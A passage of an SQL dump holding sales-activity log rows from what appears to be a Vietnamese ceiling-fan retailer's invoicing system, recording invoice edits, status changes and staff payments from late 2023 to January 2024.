(2815, 'invoice', 374, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-27 14:46:34'),
(2816, 'invoice', 374, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/377\" target=\"_blank\">#377</a>\";}', '17', 'Loan Nguyễn', '2023-12-27 14:46:34'),
(2817, 'invoice', 376, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-12-29 18:32:53'),
(2818, 'invoice', 376, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:47:\"Haiku 60 inch Caramel Bamboo, Low Profile Black\";}', '1', 'Ho Gia Phat', '2023-12-29 18:36:54'),
(2819, 'invoice', 376, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:47:\"Haiku 60 inch Caramel Bamboo, Low Profile Black\";}', '1', 'Ho Gia Phat', '2023-12-29 18:36:54'),
(2820, 'invoice', 376, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:433:\"Sải cánh 150cm (60 inch)        <br />\r\nMàu cánh: Caramel Bamboo         <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA \";i:1;s:390:\"Sải cánh 150cm (60 inch)        \r\nMàu cánh: Caramel Bamboo         \r\nMàu thân : Universal Black        \r\nĐộng cơ EC, công suất 29.3W        \r\nĐiều khiển từ xa 7 tốc độ đi kèm        \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        \r\nBộ đèn LED tuỳ chọn thêm        \r\nThương hiệu: Haiku/USA\";}', '1', 'Ho Gia Phat', '2023-12-29 18:37:38'),
(2821, 'invoice', 376, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-12-29 18:37:38'),
(2822, 'invoice', 376, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-12-30 09:14:05'),
(2823, 'invoice', 376, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-12-30 09:14:13'),
(2824, 'invoice', 376, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"37.760.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/378\" target=\"_blank\">#378</a>\";}', '1', 'Ho Gia Phat', '2023-12-30 09:14:13'),
(2825, 'invoice', 377, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-02 13:17:20'),
(2826, 'invoice', 377, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"21800000.00\";i:1;s:11:\"21500000.00\";}', '1', 'Ho Gia Phat', '2024-01-02 13:17:42'),
(2827, 'invoice', 377, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-02 13:25:27'),
(2828, 'invoice', 377, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"17.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/379\" target=\"_blank\">#379</a>\";}', '1', 'Ho Gia Phat', '2024-01-02 13:25:27'),
(2830, 'invoice', 378, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-03 15:11:02'),
(2831, 'invoice', 378, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2024-01-03 15:38:39'),
(2832, 'invoice', 379, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-04 14:23:30'),
(2833, 'invoice', 379, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-04 14:24:06'),
(2834, 'invoice', 379, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"22.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/380\" target=\"_blank\">#380</a>\";}', '17', 'Loan Nguyễn', '2024-01-04 14:24:06'),
(2835, 'invoice', 380, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-04 16:54:34'),
(2836, 'invoice', 380, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:38:\"Bộ điều khiển DC 6 tốc độ \";i:1;s:37:\"Bộ điều khiển DC 6 tốc độ\";}', '17', 'Loan Nguyễn', '2024-01-05 08:37:36'),
(2837, 'invoice', 381, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-05 08:58:43'),
(2838, 'invoice', 381, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"30\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2024-01-05 08:59:32'),
(2839, 'invoice', 381, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"25\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2024-01-05 09:06:45'),
(2840, 'invoice', 381, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-05 09:06:52'),
(2841, 'invoice', 381, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2024-01-05 09:06:52'),
(2842, 'invoice', 382, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-08 08:08:42'),
(2843, 'invoice', 382, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '1', 'Ho Gia Phat', '2024-01-08 08:16:17'),
(2844, 'invoice', 382, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-08 08:16:28'),
(2845, 'invoice', 382, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2024-01-08 08:16:28'),
(2846, 'invoice', 286, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-08 08:17:38'),
(2847, 'invoice', 286, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"24.480.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/381\" target=\"_blank\">#381</a>\";}', '1', 'Ho Gia Phat', '2024-01-08 08:17:38'),
(2848, 'invoice', 378, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-08 08:46:20'),
(2849, 'invoice', 378, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.383.800 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/382\" target=\"_blank\">#382</a>\";}', '17', 'Loan Nguyễn', '2024-01-08 08:46:20'),
(2850, 'invoice', 383, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-08 09:30:35'),
(2851, 'invoice', 380, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-08 15:44:12'),
(2852, 'invoice', 380, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/383\" target=\"_blank\">#383</a>\";}', '17', 'Loan Nguyễn', '2024-01-08 15:44:12'),
(2853, 'invoice', 345, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-09 12:10:45'),
(2854, 'invoice', 345, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"27.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/384\" target=\"_blank\">#384</a>\";}', '17', 'Loan Nguyễn', '2024-01-09 12:10:45'),
(2855, 'invoice', 345, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:53:\"Quạt trần cánh lớn Powerful S1 sải cánh 2m5\";i:1;s:52:\"Quạt trần cánh lớn Powerful S1 sải cánh 3m\";}', '17', 'Loan Nguyễn', '2024-01-09 12:11:25'),
(2856, 'invoice', 370, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2024-01-10 01:00:02'),
(2857, 'invoice', 384, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-10 11:12:02'),
(2858, 'invoice', 385, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-15 15:44:12'),
(2859, 'invoice', 385, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6800000.00\";i:1;s:10:\"4550000.00\";}', '17', 'Loan Nguyễn', '2024-01-15 15:46:06'),
(2860, 'invoice', 385, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"30\";i:1;s:0:\"\";}', '17', 'Loan Nguyễn', '2024-01-15 15:46:06'),
(2861, 'invoice', 385, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-15 15:46:14'),
(2862, 'invoice', 385, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"19.656.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/385\" target=\"_blank\">#385</a>\";}', '17', 'Loan Nguyễn', '2024-01-15 15:46:14'),
(2863, 'invoice', 385, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:23:\"tuong.tran@tecon.com.vn\";}', '17', 'Loan Nguyễn', '2024-01-15 15:46:18'),
(2864, 'invoice', 386, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-17 10:52:16'),
(2865, 'invoice', 386, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '1', 'Ho Gia Phat', '2024-01-17 10:53:03'),
(2866, 'invoice', 386, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Quạt trần 3 cánh gỗ RUCKUS 60\";}', '1', 'Ho Gia Phat', '2024-01-17 10:53:03'),
(2867, 'invoice', 386, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2024-01-17 10:53:54'),
(2868, 'invoice', 387, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-17 13:52:41'),
(2869, 'invoice', 387, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";}', '17', 'Loan Nguyễn', '2024-01-17 13:56:34'),
(2870, 'invoice', 387, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2024-01-17 13:56:34'),
(2871, 'invoice', 387, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-17 13:56:39'),
(2872, 'invoice', 387, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2024-01-17 13:56:39'),
(2873, 'invoice', 386, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";i:1;s:32:\"Quạt trần SINO 52 White Wood\";}', '17', 'Loan Nguyễn', '2024-01-17 14:01:46'),
(2874, 'invoice', 386, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:328:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm\";i:1;s:260:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)    Điều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2024-01-17 14:01:46'),
(2875, 'invoice', 386, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2024-01-17 14:01:46'),
(2876, 'invoice', 388, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-17 14:18:45'),
(2877, 'invoice', 388, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:29:\"Bộ đèn LED Haiku L series\";}', '1', 'Ho Gia Phat', '2024-01-17 14:20:44'),
(2878, 'invoice', 388, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-17 14:20:55'),
(2879, 'invoice', 388, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2024-01-17 14:20:55'),
(2880, 'invoice', 386, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-17 15:05:56'),
(2881, 'invoice', 386, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/386\" target=\"_blank\">#386</a>\";}', '1', 'Ho Gia Phat', '2024-01-17 15:05:56'),
(2882, 'invoice', 386, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:350:\"Đường kính cánh 132cm, 152 cm màu sắc tùy chọn Dark Walnut / Timber Wood. <br />\r\nĐộng cơ vẫn thiết kế tiêu chuẩn Ultra-BLDC với hiệu suất cao công suất chỉ 38 W <br />\r\nNhập khẩu phân phối - bảo hành chính hãng 05 năm động cơ. <br />\r\nThương hiệu Tổ chức đào tạo WIT, sản xuất tại Trung Quốc\";i:1;s:310:\"Đường kính cánh152 cm màu sắc tùy chọn Timber Wood. \r\nĐộng cơ vẫn thiết kế tiêu chuẩn Ultra-BLDC với hiệu suất cao công suất chỉ 38 W \r\nNhập khẩu phân phối - bảo hành chính hãng 05 năm động cơ. \r\nThương hiệu Tổ chức đào tạo WIT, sản xuất tại Trung Quốc\";}', '17', 'Loan Nguyễn', '2024-01-17 15:23:38'),
(2883, 'invoice', 387, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";}', '1', 'Ho Gia Phat', '2024-01-18 10:07:21'),
(2884, 'invoice', 387, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:211:\"Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Đen <br />\r\nMàu cánh: Dark Walnut <br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT\";i:1;s:181:\"Sải cánh 132cm \r\nMàu thân quạt: Màu Đen \r\nMàu cánh: Dark Walnut \r\nĐộng cơ DC, công suất 35W \r\nĐiều khiển từ xa 5 cấp độ \r\nThương hiệu: Tổ chức đào tạo WIT\";}', '1', 'Ho Gia Phat', '2024-01-18 10:07:21'),
(2885, 'invoice', 387, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:25:\"Lắp đặt miễn phí \";}', '1', 'Ho Gia Phat', '2024-01-18 10:07:21'),
(2886, 'invoice', 387, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"350000.00\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2024-01-18 10:07:21'),
(2887, 'invoice', 387, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";i:1;s:4:\"3.00\";i:2;s:1:\"2\";}', '1', 'Ho Gia Phat', '2024-01-18 10:07:21'),
(2888, 'invoice', 389, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-19 14:46:19'),
(2889, 'invoice', 389, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '1', 'Ho Gia Phat', '2024-01-19 14:46:49'),
(2890, 'invoice', 389, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:243:\"Gia cố móc trần bê tông <br />\r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) <br />\r\n- Gia cố dây cáp inox an toàn <br />\r\n- Đấu điện cấp nguồn cho quạt <br />\r\n- Cân bằng hoạt động cánh quạt  <br />\r\n\";i:1;s:209:\"Gia cố móc trần bê tông \r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) \r\n- Gia cố dây cáp inox an toàn \r\n- Đấu điện cấp nguồn cho quạt \r\n- Cân bằng hoạt động cánh quạt\";}', '1', 'Ho Gia Phat', '2024-01-19 16:20:26'),
(2891, 'invoice', 389, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:21:10'),
(2892, 'invoice', 389, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"157.325.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/387\" target=\"_blank\">#387</a>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:21:10'),
(2893, 'invoice', 386, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:25:23'),
(2894, 'invoice', 386, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"15.075.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/388\" target=\"_blank\">#388</a>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:25:23'),
(2895, 'invoice', 388, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:25:42');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(2896, 'invoice', 388, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"22.350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/389\" target=\"_blank\">#389</a>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:25:42'),
(2897, 'invoice', 382, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:27:37'),
(2898, 'invoice', 382, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"90.900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/390\" target=\"_blank\">#390</a>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:27:37'),
(2899, 'invoice', 384, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:28:01'),
(2900, 'invoice', 384, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/391\" target=\"_blank\">#391</a>\";}', '1', 'Ho Gia Phat', '2024-01-19 16:28:01'),
(2901, 'invoice', 383, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-20 08:07:24'),
(2902, 'invoice', 383, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/392\" target=\"_blank\">#392</a>\";}', '17', 'Loan Nguyễn', '2024-01-20 08:07:24'),
(2903, 'invoice', 390, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-23 08:18:38'),
(2904, 'invoice', 387, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"2.00\";i:2;s:1:\"3\";}', '17', 'Loan Nguyễn', '2024-01-23 11:20:58'),
(2905, 'invoice', 387, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:25:\"Lắp đặt miễn phí \";i:1;s:24:\"Lắp đặt miễn phí\";}', '17', 'Loan Nguyễn', '2024-01-23 11:20:58'),
(2906, 'invoice', 390, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:37:\"Bộ điều khiển quạt Sunon Ps1\";}', '17', 'Loan Nguyễn', '2024-01-23 11:23:07'),
(2907, 'invoice', 390, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Phí thi công phần mái treo quạt\";}', '17', 'Loan Nguyễn', '2024-01-23 11:23:07'),
(2908, 'invoice', 390, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:38:\"Phí thi công phần mái treo quạt\";i:1;s:37:\"Phí gia cố phần mái treo quạt\";}', '17', 'Loan Nguyễn', '2024-01-23 11:51:40'),
(2909, 'invoice', 391, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2024-01-23 13:54:03'),
(2910, 'estimate', 248, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2024-01-23 14:17:03'),
(2911, 'estimate', 249, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2024-01-23 15:09:11'),
(2912, 'estimate', 249, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '1', 'Ho Gia Phat', '2024-01-23 15:09:20'),
(2913, 'invoice', 392, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-23 15:22:45'),
(2914, 'invoice', 392, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-23 15:22:55'),
(2915, 'invoice', 392, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"810.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/393\" target=\"_blank\">#393</a>\";}', '17', 'Loan Nguyễn', '2024-01-23 15:22:55'),
(2916, 'invoice', 390, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-24 08:17:43'),
(2917, 'invoice', 390, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/394\" target=\"_blank\">#394</a>\";}', '17', 'Loan Nguyễn', '2024-01-24 08:17:43'),
(2918, 'invoice', 389, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2024-01-24 09:14:48'),
(2919, 'invoice', 340, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:28:\"Bộ đèn LED quạt trần\";}', '1', 'Ho Gia Phat', '2024-01-24 10:38:44'),
(2920, 'invoice', 340, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '1', 'Ho Gia Phat', '2024-01-24 10:38:44'),
(2921, 'invoice', 340, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:41:\"Điều khiển dành cho quạt 52YFT811\";i:1;s:43:\"Điều khiển dành cho quạt 52YFT7062K\";}', '1', 'Ho Gia Phat', '2024-01-24 10:38:44'),
(2922, 'invoice', 340, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-24 10:39:43'),
(2923, 'invoice', 340, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2024-01-24 10:39:43'),
(2924, 'invoice', 340, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-24 17:22:21'),
(2925, 'invoice', 340, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/395\" target=\"_blank\">#395</a>\";}', '17', 'Loan Nguyễn', '2024-01-24 17:22:21'),
(2926, 'invoice', 375, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2024-01-26 01:00:02'),
(2927, 'invoice', 393, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-26 08:23:05'),
(2928, 'invoice', 394, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-01-26 08:58:17'),
(2929, 'invoice', 394, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2024-01-26 08:59:49'),
(2930, 'invoice', 394, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2024-01-26 08:59:49'),
(2931, 'invoice', 387, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";i:1;s:4:\"2.00\";i:2;s:1:\"3\";}', '17', 'Loan Nguyễn', '2024-01-26 13:42:50'),
(2932, 'invoice', 387, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:10:\"3900000.00\";}', '17', 'Loan Nguyễn', '2024-01-26 13:43:57'),
(2933, 'invoice', 387, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-26 13:57:45'),
(2934, 'invoice', 387, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.700.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/396\" target=\"_blank\">#396</a>\";}', '1', 'Ho Gia Phat', '2024-01-26 13:57:45'),
(2935, 'invoice', 386, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-26 14:14:45'),
(2936, 'invoice', 386, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";i:1;s:4:\"5.00\";i:2;s:1:\"0\";}', '1', 'Ho Gia Phat', '2024-01-26 14:17:02'),
(2937, 'invoice', 386, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6300000.00\";i:1;s:7:\"4095000\";}', '1', 'Ho Gia Phat', '2024-01-26 14:19:27'),
(2938, 'invoice', 386, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8300000.00\";i:1;s:7:\"5395000\";}', '1', 'Ho Gia Phat', '2024-01-26 14:19:27'),
